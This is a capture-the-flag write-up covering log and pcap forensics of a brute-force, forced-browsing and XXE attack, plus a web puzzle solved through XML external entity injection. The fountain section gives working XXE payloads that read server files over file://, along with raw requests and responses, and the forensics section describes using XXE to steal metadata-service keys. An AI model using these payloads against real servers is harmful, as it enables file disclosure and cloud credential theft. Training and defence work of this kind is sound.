Web Ring

Boria PCAP Mining
In this challenge we are given several artifacts and have to answer a series of questions.
The zip file contains a web error log (weberror.log) and a pcap file.
First question - Most of the traffic to this site is nice, but one IP address is being naughty! Which is it?
To list every client IP together with its HTTP status code, minus the entries that contain text, we can run:
cat weberror.log | cut -d" " -f1,9 | grep -v -P '[a-zA-Z]'
Breakdown of the command:
- cat weberror.log - prints the contents of weberror.log
- cut -d" " -f1,9 - keeps only the 1st and 9th space-separated fields (client IP and HTTP status code)
- grep -v -P '[a-zA-Z]' - drops every line that still contains a letter, i.e. error entries and anything that is not a request line (the pattern is quoted so the shell does not treat it as a glob)
All that remains is to stack the results, so we append | sort | uniq -c | sort -n to the previous command. This counts how many times each IP/status pair occurs and then sorts by that count, so the last line shows the IP and status code with the most hits.

We can see one IP with a large number of 404 - Not Found responses.
Second question - The first attack is a brute force login. What's the first username tried?
For this question the pcap is the handy artifact. We need to isolate the POST requests coming from the malicious IP, which the following display filter does: ip.src == 18.222.86.32 and http.request.method == "POST". The first POST to the login page carries the first username tried.

Third question - The next attack is forced browsing where the naughty one is guessing URLs. What's the first successful URL path in this attack?
For this question either file would do, but I found it easier to use Wireshark. The idea is to build a display filter that shows all responses from the server to the malicious IP, add the HTTP status code (http.response.code) as a column, identify where the attack is running, and then look for a 302 or 200 in the middle of the run of 404s.
For the display filter we use: ip.dst == 18.222.86.32 and http.response
The forced browsing attack starts at packet 23355. From there we just need to look for the first HTTP status code that is not a 404 and we have the answer we are after.

Fourth question - The last step in this attack was to use XXE to get secret keys from the IMDS service. What URL did the attacker force the server to fetch?
For this question I find it easier to leverage weberror.log. IMDS stands for Instance Metadata Service. Assuming this is an AWS instance, the service is reached at 169.254.169.254 and requests to it look like http://169.254.169.254/latest/meta-data/ . Knowing this we just need to look for entries matching that address and find the one whose response contained an AWS Access Key ID, Secret Access Key and Token. One caveat worth remembering: a classic XXE can only make the server issue a GET, so this attack only works while IMDSv1 is still enabled; IMDSv2 requires a session token obtained with a PUT request first.
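As an added example (my own code, not part of the challenge artifacts or the commands above), here is the same stacking done in Python over a few constructed log lines in Apache combined format, together with the two other log-side checks from this challenge: the first non-404 inside the attacker's forced-browsing run, and any line that mentions the IMDS address. The attacker IP is the one from this challenge; the paths, timestamps and the trailing error line are made up for illustration.

```python
import re
from collections import Counter

# Apache "combined"-style access line: client IP is field 1 and the status
# code is field 9, the two fields the cut -d" " -f1,9 pipeline keeps.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Anything pointing at the AWS metadata endpoint, regardless of log format.
IMDS_RE = re.compile(r'https?://169\.254\.169\.254[^\s"]*')

# Constructed sample: one benign client, the attacker's login POST, a run of
# 404s with one 302 in the middle, and a non-request error line at the end.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Dec/2022:12:00:01 +0000] "GET / HTTP/1.1" 200 1234
18.222.86.32 - - [22/Dec/2022:12:00:02 +0000] "POST /login HTTP/1.1" 200 512
18.222.86.32 - - [22/Dec/2022:12:00:03 +0000] "GET /admin HTTP/1.1" 404 196
18.222.86.32 - - [22/Dec/2022:12:00:04 +0000] "GET /backup HTTP/1.1" 404 196
18.222.86.32 - - [22/Dec/2022:12:00:05 +0000] "GET /proc HTTP/1.1" 302 0
18.222.86.32 - - [22/Dec/2022:12:00:06 +0000] "GET /old HTTP/1.1" 404 196
10.0.0.7 - - [22/Dec/2022:12:00:07 +0000] "GET /about HTTP/1.1" 200 800
[Thu Dec 22 12:00:08 2022] [error] XXE fetch http://169.254.169.254/latest/meta-data/
"""


def parse(lines):
    """One record per request line; lines that do not match (error text, noise)
    are skipped, which is what grep -v -P '[a-zA-Z]' achieved in the pipeline."""
    records = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def stack(records):
    """Equivalent of | sort | uniq -c | sort -n: hits per (ip, status) pair."""
    return Counter((r["ip"], r["status"]) for r in records)


def noisiest_ip(records, status="404"):
    """The IP with the most responses of the given status (question 1)."""
    counts = Counter(r["ip"] for r in records if r["status"] == status)
    ip, _ = counts.most_common(1)[0]
    return ip


def first_hit_after_404s(records, ip):
    """Forced browsing (question 3): once the attacker's 404 run has started,
    return the first (path, status) that answered with something other than 404."""
    in_run = False
    for r in records:
        if r["ip"] != ip:
            continue
        if r["status"] == "404":
            in_run = True
        elif in_run:
            return r["path"], r["status"]
    return None


def imds_urls(lines):
    """Every URL in the log that targets the metadata service (question 4)."""
    return [m.group(0) for line in lines for m in IMDS_RE.finditer(line)]


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    recs = parse(lines)
    for (ip, status), n in sorted(stack(recs).items(), key=lambda kv: kv[1]):
        print(f"{n:4d} {ip} {status}")
    naughty = noisiest_ip(recs)
    print("naughty IP:", naughty)
    print("first forced-browsing hit:", first_hit_after_404s(recs, naughty))
    print("IMDS fetches:", imds_urls(lines))
```

The regex does the job of both cut and grep at once: a line that is not a request line simply does not match, so the error entries never reach the counter, and the IMDS search runs over the raw lines precisely because the entry that records the server-side fetch will not look like a normal request line.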

Open Boria Mine Door
This challenge took me some time to fully understand, and I'm sure I did not solve it the intended way, but if it works it works; let's take the wins as we can.
We need to inject HTML code/objects in order to match the colours and connect the different pipes. Each lock has a different protection applied, which makes it harder and harder to inject the payloads.

After looking into the source code it was possible to identify each lock and its protections.



https://blog.detectify.com/2019/07/11/content-security-policy-csp-explained-including-common-bypasses/ - contains a really good explanation (better than I would be able to give) of how CSP works and how it can be bypassed. For this lock we can still use the same payload as before.


To solve the remaining locks I moved from div objects to svg objects. My knowledge of these objects is close to nil, so instead of rotating an object I just created more and more objects.

By now we could move on to the next challenge, but there is a bonus for opening all the doors, so the journey continues.

From reading the source code I can't explain how this payload works; all I know is that after many tries it worked. I know I should be able to explain why, but I can't.


As before, I can't explain why this payload works.



The answers for locks 4, 5 and 6 don't always work; I noticed this while writing this writeup.
Glamtariel's Fountain

This challenge is hosted at https://glamtarielsfountain.com/ and is best solved with a proxy such as Burp Suite in front of the browser.

After playing with the app for a while (dragging the objects onto Glamtariel or onto the fountain) the objects change and new characters appear.
Looking in Burp at the request for dropping Santa onto Glamtariel we can see the below:

In this request Santa is img2 and the drop location is set by the who field, in this case princess. After dragging more objects we move on to a different set of objects. While moving these objects we also receive hints that will be important to complete the challenge.

After moving the objects again we reach a third set of objects, but this time a new creature appears.

At first I ignored this event, but later I noticed that this was the point from which we could change the content type (the TYPE hint) from application/json to application/xml. Below is the original JSON request, followed by the same request re-sent as XML:
POST /dropped HTTP/2
Host: glamtarielsfountain.com
Cookie: MiniLembanh=5cd3e613-59f6-4bed-b872-0ecbddefc710.DSATr_F2wS9jdg7z6oJKEmcblT8; GCLB="6069430908e4bb82"
Content-Length: 52
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json
Content-Type: application/json
X-Grinchum: Ijc0NzlmMzA1Nzg0OTdhODI4ZjIxMDU0Yzk3MzRlN2ZiYmZhN2IyMmMi.Y6RMXw.q2UciNmm9WCq5MtTamW93OUPXkQ
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://glamtarielsfountain.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://glamtarielsfountain.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{"imgDrop":"img2","who":"princess","reqType":"json"}

The same request, re-sent with Content-Type: application/xml:

POST /dropped HTTP/2
Host: glamtarielsfountain.com
Cookie: MiniLembanh=5cd3e613-59f6-4bed-b872-0ecbddefc710.DSATr_F2wS9jdg7z6oJKEmcblT8; GCLB="6069430908e4bb82"
Content-Length: 131
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json
Content-Type: application/xml
X-Grinchum: Ijc0NzlmMzA1Nzg0OTdhODI4ZjIxMDU0Yzk3MzRlN2ZiYmZhN2IyMmMi.Y6RMXw.q2UciNmm9WCq5MtTamW93OUPXkQ
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://glamtarielsfountain.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://glamtarielsfountain.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
<?xml version="1.0" encoding="UTF-8" ?>
<root>
<imgDrop>img2</imgDrop>
<who>princess</who>
<reqType>xml</reqType>
</root>
After solving the previous challenge (the 6 locks) we are given a hint that we need to exploit an XML External Entity (XXE) injection. After many, many tries (and leveraging the hints) I was finally able to discover the injectable field and the path to read.
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///app/static/images/ringlist.txt" > ]>
<root>
<imgDrop>&xxe;</imgDrop>
<who>princess</who>
<reqType>xml</reqType>
</root>

Response:

HTTP/2 200 OK
Server: Werkzeug/2.2.2 Python/3.10.8
Date: Thu, 22 Dec 2022 12:40:34 GMT
Content-Type: application/json
Content-Length: 350
Set-Cookie: MiniLembanh=5cd3e613-59f6-4bed-b872-0ecbddefc710.DSATr_F2wS9jdg7z6oJKEmcblT8; Domain=glamtarielsfountain.com; Path=/
Via: 1.1 google
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
{
"appResp": "Ah, you found my ring list! Gold, red, blue - so many colors! Glad I don't keep any secrets in it any more! Please though, don't tell anyone about this.^She really does try to keep things safe. Best just to put it away. (click)",
"droppedOn": "none",
"visit": "static/images/pholder-morethantopsupersecret63842.png,262px,100px"
}
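To make clear why being allowed to switch the Content-Type mattered, here is an added example of my own (it is not the challenge's server code) that models a /dropped handler which picks its parser from the Content-Type header and feeds it the payload above. It uses Python's xml.sax, which since 3.7.1 leaves external general entities disabled by default; flipping that one feature reproduces the vulnerable behaviour. The file it reads is a constructed stand-in for /app/static/images/ringlist.txt written to a temporary directory.

```python
import io
import json
import tempfile
import xml.sax
import xml.sax.handler
from pathlib import Path


class FieldCollector(xml.sax.handler.ContentHandler):
    """Collect the text of each element (imgDrop, who, reqType) into a dict."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._buf = []

    def startElement(self, name, attrs):
        self._buf = []

    def characters(self, content):
        # Literal text and text spliced in from a resolved external entity both
        # arrive here, which is how a file's contents end up inside a field.
        self._buf.append(content)

    def endElement(self, name):
        self.fields[name] = "".join(self._buf).strip()
        self._buf = []


def parse_xml_body(body, allow_external_entities=False):
    """Parse an XML request body. True is the vulnerable configuration: a
    SYSTEM entity is fetched (file:// included) and its text replaces &xxe;."""
    handler = FieldCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.setFeature(xml.sax.handler.feature_external_ges, allow_external_entities)
    parser.parse(io.BytesIO(body))
    return handler.fields


def handle_dropped(content_type, body, allow_external_entities=False):
    """Model of the /dropped endpoint: the client's Content-Type selects the
    parser, so a client meant to send JSON can hand the server a DOCTYPE."""
    if content_type.startswith("application/json"):
        return {k: str(v) for k, v in json.loads(body).items()}
    if content_type.startswith("application/xml"):
        return parse_xml_body(body, allow_external_entities)
    raise ValueError("unsupported Content-Type: " + content_type)


def xxe_payload(target_uri, field="imgDrop"):
    """Build the writeup's payload with the entity reference in the chosen
    field (imgDrop at first, reqType after the REQ hint)."""
    fields = {"imgDrop": "img2", "who": "princess", "reqType": "xml"}
    fields[field] = "&xxe;"
    body = "".join(f"<{k}>{v}</{k}>\n" for k, v in fields.items())
    return (
        '<?xml version="1.0" encoding="UTF-8" ?>\n'
        f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{target_uri}" > ]>\n'
        f"<root>\n{body}</root>"
    ).encode()


def demo():
    """Write a constructed ringlist.txt, then run the same payload through the
    JSON path, the vulnerable XML parser and the default (safe) XML parser."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = Path(tmp) / "ringlist.txt"
        secret.write_text("Gold, red, blue - so many colors!")  # constructed
        payload = xxe_payload(secret.as_uri())
        json_body = b'{"imgDrop":"img2","who":"princess","reqType":"json"}'
        return {
            "json": handle_dropped("application/json", json_body),
            "vulnerable": handle_dropped("application/xml", payload, True),
            "default": handle_dropped("application/xml", payload),
        }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:10s} imgDrop={result['imgDrop']!r}")
```

Two things are worth noticing when running it. With the safe default the entity does not raise an error, it silently resolves to nothing, so a field that comes back empty instead of "img2" is itself a sign that the parser accepted a DOCTYPE. And the root cause is not the parser flag alone but the endpoint accepting XML at all on what the front end only ever sends as JSON; rejecting unexpected content types, or rejecting any document with a DOCTYPE, closes the door regardless of parser settings.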
As part of the response we are given a local path. Visiting https://glamtarielsfountain.com/static/images/pholder-morethantopsupersecret63842.png shows the image below.

From this image we can see a folder name (x_phial_pholder_2022) and two file names (bluering.txt and redring.txt). Let's try to retrieve them and see what we get:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/bluering.txt" > ]>
<root>
<imgDrop>&xxe;</imgDrop>
<who>princess</who>
<reqType>xml</reqType>
</root>
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/redring.txt" > ]>
<root>
<imgDrop>&xxe;</imgDrop>
<who>princess</who>
<reqType>xml</reqType>
</root>

Response for bluering.txt:

{
"appResp": "I love these fancy blue rings! You can see we have two of them. Not magical or anything, just really pretty.^She definitely tries to convince everyone that the blue ones are her favorites. I'm not so sure though.",
"droppedOn": "none",
"visit": "none"
}

Response for redring.txt:

{
"appResp": "Hmmm, you still seem awfully interested in these rings. I can't blame you, they are pretty nice.^Oooooh, I can just tell she'd like to talk about them some more.",
"droppedOn": "none",
"visit": "none"
}

Recalling that the last set of objects had 4 rings (2 red, 1 blue and 1 silver), the next step was to try silverring.txt as well:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/silverring.txt" > ]>
<root>
<imgDrop>&xxe;</imgDrop>
<who>princess</who>
<reqType>xml</reqType>
</root>

Response:

{
"appResp": "I'd so love to add that silver ring to my collection, but what's this? Someone has defiled my red ring! Click it out of the way please!.^Can't say that looks good. Someone has been up to no good. Probably that miserable Grinchum!",
"droppedOn": "none",
"visit": "static/images/x_phial_pholder_2022/redring-supersupersecret928164.png,267px,127px"
}

Once again the response contains a local path to another image: https://glamtarielsfountain.com/static/images/x_phial_pholder_2022/redring-supersupersecret928164.png

This time we get a red ring with an interesting inscription (goldring_to_be_deleted.txt). Time to try this new payload:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/goldring_to_be_deleted.txt" > ]>
<root>
<imgDrop>&xxe;</imgDrop>
<who>princess</who>
<reqType>xml</reqType>
</root>

Response:

{
"appResp": "Hmmm, and I thought you wanted me to take a look at that pretty silver ring, but instead, you've made a pretty bold REQuest. That's ok, but even if I knew anything about such things, I'd only use a secret TYPE of tongue to discuss them.^She's definitely hiding something.",
"droppedOn": "none",
"visit": "none"
}

This response gives a new hint, REQ. After some time I realised that, together with the earlier TYPE hint, it meant the XXE entity had to move into the reqType field, with imgDrop pointing at the silver ring (img1):
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/goldring_to_be_deleted.txt" > ]>
<root>
<imgDrop>img1</imgDrop>
<who>princess</who>
<reqType>&xxe;</reqType>
</root>

Response:

{
"appResp": "No, really I couldn't. Really? I can have the beautiful silver ring? I shouldn't, but if you insist, I accept! In return, behold, one of Kringle's golden rings! Grinchum dropped this one nearby. Makes one wonder how 'precious' it really was to him. Though I haven't touched it myself, I've been keeping it safe until someone trustworthy such as yourself came along. Congratulations!^Wow, I have never seen that before! She must really trust you!",
"droppedOn": "none",
"visit": "static/images/x_phial_pholder_2022/goldring-morethansupertopsecret76394734.png,200px,290px"
}

Question - Stare into Glamtariel's fountain and see if you can find the ring! What is the filename of the ring she presents you?

The filename in the visit field of that last response is the one she presents you.
